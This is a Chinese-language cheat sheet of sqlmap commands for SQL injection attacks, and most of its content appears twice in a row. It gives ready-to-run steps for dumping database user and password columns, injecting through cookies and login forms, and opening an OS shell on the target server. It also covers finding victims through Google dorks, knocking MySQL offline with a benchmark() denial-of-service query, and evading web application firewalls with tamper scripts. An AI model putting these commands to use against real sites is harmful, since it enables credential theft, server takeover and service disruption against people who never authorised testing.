1&&2.
sqlmap -u "url" --dbs
sqlmap -u "url" -D somedatabase --tables
sqlmap -u "url" -D somedatabase -T sometable --columns
sqlmap -u "url" -D somedatabase -T sometable -C "user,password" --dump
3.cookie注入
sqlmap -u "http://www.*/Show.asp" --cookie "id=9" --table --level 2
4.post登陆框注入
注入点:http://test.com/Login.asp
sqlmap -u http://test.com/Login.asp --forms
sqlmap -u http://test.com/Login.asp --data "tfUName=1&tfUPass=1"
几种注入方式:./sqlmap.py -r search-test.txt -p tfUPass
search-test.txt为截获的http包 tfupass为注入的参数
5.写入交互shell
注入点:http://192.168.159.1/news.php?id=1
sqlmap -u http://192.168.159.1/news.php?id=1 --os-shell
需要知道站点的根目录
6.伪静态注入
eg:url: http://******/40.html
---> sqlmap -u http://******/40*.html --dbs
7.请求延时 --delay 1 延时1s --safe-freq 3 3次
8.sqlmap结合google搜索 sqlmap -g inurl:php?id=
9.sqlmap--mysql dos 攻击
sqlmap-u http://192.168.159.1/news.php?id=1 --sql-shell
sql-shell> select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
10.waf防火墙
注入点:http://192.168.159.1/news.php?id=1
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch --tamper "space2morehash.py"
space2hash.py base64encode.py charencode.py
采用不同的编码方式绕过
sqlmap -u "url" --dbs
sqlmap -u "url" -D somedatabase --tables
sqlmap -u "url" -D somedatabase -T sometable --columns
sqlmap -u "url" -D somedatabase -T sometable -C "user,password" --dump
3.cookie注入
sqlmap -u "http://www.*/Show.asp" --cookie "id=9" --table --level 2
4.post登陆框注入
注入点:http://test.com/Login.asp
sqlmap -u http://test.com/Login.asp --forms
sqlmap -u http://test.com/Login.asp --data "tfUName=1&tfUPass=1"
几种注入方式:./sqlmap.py -r search-test.txt -p tfUPass
search-test.txt为截获的http包 tfupass为注入的参数
5.写入交互shell
注入点:http://192.168.159.1/news.php?id=1
sqlmap -u http://192.168.159.1/news.php?id=1 --os-shell
需要知道站点的根目录
6.伪静态注入
eg:url: http://******/40.html
---> sqlmap -u http://******/40*.html --dbs
7.请求延时 --delay 1 延时1s --safe-freq 3 3次
8.sqlmap结合google搜索 sqlmap -g inurl:php?id=
9.sqlmap--mysql dos 攻击
sqlmap-u http://192.168.159.1/news.php?id=1 --sql-shell
sql-shell> select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
10.waf防火墙
注入点:http://192.168.159.1/news.php?id=1
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch --tamper "space2morehash.py"
space2hash.py base64encode.py charencode.py
采用不同的编码方式绕过